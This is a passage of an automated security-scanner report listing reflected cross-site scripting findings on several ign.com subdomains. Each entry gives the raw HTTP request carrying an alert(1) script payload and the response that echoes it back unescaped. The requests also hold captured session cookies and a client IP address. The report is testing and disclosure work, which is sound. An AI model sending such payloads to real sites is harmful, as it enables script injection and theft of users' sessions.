The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79428"><script>alert(1)</script>f8b26e0b0f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ob2/068/077/077644.html?79428"><script>alert(1)</script>f8b26e0b0f3=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:07 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 106860
1.100. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/077/077723.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c538f"-alert(1)-"ca764e476e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ob2/068/077/077723.html?c538f"-alert(1)-"ca764e476e0=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:02 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 109334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/ob2/068/077/077723.html?c538f"-alert(1)-"ca764e476e0=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.101. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/077/077723.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff970"><script>alert(1)</script>75476dfe71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ob2/068/077/077723.html?ff970"><script>alert(1)</script>75476dfe71e=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:12:59 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 104169
1.102. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/142/14235018.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801b0"-alert(1)-"e0bf0ad5652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ob2/068/142/14235018.html?801b0"-alert(1)-"e0bf0ad5652=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:08 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 120521
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... scoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/ob2/068/142/14235018.html?801b0"-alert(1)-"e0bf0ad5652=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.103. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/ob2/068/142/14235018.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25be8"><script>alert(1)</script>f1c064d66f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ob2/068/142/14235018.html?25be8"><script>alert(1)</script>f1c064d66f3=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:13:05 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 120600
1.104. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/sendcheats.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c92f"-alert(1)-"8c3aa49fd93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sendcheats.html?9c92f"-alert(1)-"8c3aa49fd93=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:12:55 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 78118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Send Cheats</title ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/sendcheats.html?9c92f"-alert(1)-"8c3aa49fd93=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.105. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/sendcheats.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be516"><script>alert(1)</script>130f141382a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendcheats.html?be516"><script>alert(1)</script>130f141382a=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:12:53 GMT Pragma: no-cache Cache-Control: must-revalidate,no-cache,no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 78164
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3abb4<script>alert(1)</script>6da74b2156f was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/api/objects/user.js?callback=?3abb4<script>alert(1)</script>6da74b2156f HTTP/1.1 Host: club.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:12:15 GMT Content-Type: application/x-javascript Set-Cookie: NSC_vtfsqbhft_iuuq_wjq=ffffffff0909737b45525d5f4f58455e445a4a423660;path=/;httponly Content-Length: 94
?3abb4<script>alert(1)</script>6da74b2156f({"message":"objects not found for logged in user"})
1.107. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b97e"-alert(1)-"d8da5fb0758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9b97e"-alert(1)-"d8da5fb0758=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Comics: Review ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/?9b97e"-alert(1)-"d8da5fb0758=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.108. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e1c"><script>alert(1)</script>7a3764f3771 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?24e1c"><script>alert(1)</script>7a3764f3771=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.109. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/articles/113/1136508p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53c59"-alert(1)-"e80a33c5c90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/113/1136508p1.html?53c59"-alert(1)-"e80a33c5c90=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://comics.ign.com/articles/113/1136508p1.html?53c59"-alert(1)-"e80a33c5c90=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.110. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/articles/113/1136508p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39411"><script>alert(1)</script>24e9a9f553c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/113/1136508p1.html?39411"><script>alert(1)</script>24e9a9f553c=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.111. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/characters.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e150"><script>alert(1)</script>acaf8d67148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/characters.html?6e150"><script>alert(1)</script>acaf8d67148=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.112. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comics.ign.com
Path:
/index/characters.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7f6"-alert(1)-"8e609d735dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/characters.html?3c7f6"-alert(1)-"8e609d735dc=1 HTTP/1.1 Host: comics.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
